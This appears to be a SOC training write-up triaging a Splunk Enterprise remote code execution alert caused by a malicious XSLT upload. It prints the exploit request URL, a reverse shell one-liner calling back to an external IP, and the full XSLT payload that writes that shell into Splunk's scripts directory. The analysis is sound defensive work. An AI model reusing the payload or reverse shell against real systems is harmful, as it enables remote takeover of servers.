# Event Details
- EventID : 201
- Event Time : Nov, 21, 2023, 12:24 PM
- Rule : SOC239 - Remote Code Execution Detected in Splunk Enterprise
- Level : Security Analyst
- Trigger: Unauthorized access
- Source IP Address : 180.101.88.240
- Destination IP Address : 172.16.20.13
- Hostname : Splunk Enterprise
- HTTP Request Method : POST
- Requested URL : http://18.219.80.54:8000/en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl
- Trigger File Path : /opt/splunk/var/run/splunk/dispatch/1700556926.3/shell.xsl
- Alert Trigger Reason : Detected a malicious XSLT upload in Splunk Enterprise with the potential to trigger remote code execution.
- Device Action : Allowed

# Analysis
- Downloaded file is a zip containing a php extension file and xsl extension file.
- Hashes of both files are as below:
```txt
e81675b4364808e8b36f103f8d18c7af672c5c40bad60111751cad724226e17d  shell.sh
5eb8e173613b8b2d7efc752c965ed3a86244cda76ba246db6ff4d11c3431270c  shell.xsl
```
- File type are:
```txt
shell.sh:  ASCII text, with no line terminators
shell.xsl: XML 1.0 document, ASCII text, with CRLF line terminators
```
- Before diving further, let's check the reputation of the IPs and files.
```txt
- Source IP Address : 180.101.88.240
- Destination IP Address : 172.16.20.13
```
- Source IP is from external, Destination IP is our internal splunk enterprise server.
- Source IP is deemed malicious from scanners.
![Alt text](image.png)
- Checking our log management, there's no traffic between the two.
- Checking host logs, they were also no traces of the attacker.

## Static Analysis
- Now let's look at the URL of the actual attack.
```http
http://18.219.80.54:8000/en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl
```
- And we can see the associated file in the URl is stored in the server as well as mentioned in the event.
```sh
/opt/splunk/var/run/splunk/dispatch/1700556926.3/shell.xsl
```
- From experience, this looks an attempt to invoke a reverse shell to attempt remote code execution on the host. If `shell.xsl` is invoked, and it contains code that reaches out to a listener, the attacker may be able to get a remote shell on the host.

### Analysis of the file
- First file is `shell.sh`
```sh
sh -i >& /dev/tcp/180.101.88.240/1923 0>&1sh-4.2$
```
- This is a basic reverse shell liner. When ran it will create a connection to the IP.

- Second file is `shell.xls` is the uploaded file.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
  <xsl:template match="/">
    <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
        <xsl:text>sh -i &gt;&amp; /dev/tcp/180.101.88.240/1923 0&gt;&amp;1</xsl:text>
    </exsl:document>
  </xsl:template>
</xsl:stylesheet>
```

- So when the `shell.xls` file is invoked in the splunk interface, the file will execute the following command in the xml file considering there is a remote code execution capability in the file.

# Verdict
- While we didn't find any traces of network logs that the attacker managed to gain access, we should always assume there is always a breach and escalate to tier 2. This is a true positive.







